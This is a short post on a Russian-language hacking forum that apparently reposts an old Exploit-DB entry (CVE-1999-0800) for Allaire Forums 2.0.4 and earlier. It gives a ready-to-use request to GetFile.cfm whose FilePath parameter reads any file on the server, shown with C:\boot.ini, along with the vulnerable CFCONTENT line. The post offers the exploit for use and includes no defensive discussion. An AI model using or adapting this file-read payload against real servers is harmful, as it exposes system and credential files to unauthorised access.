Exploit Allaire Forums 2.0.4 - Getfile

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
19193
Проверка EDB
  1. Пройдено
Автор
CAMERON CHILDRESS
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-1999-0800
Дата публикации
1999-02-11
Код:
source: https://www.securityfocus.com/bid/229/info

An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier. 

Type the URL "GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini" (without the quotes") where C:\boot.ini is the pathname and file to read.

The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#">
 
Источник
www.exploit-db.com

Похожие темы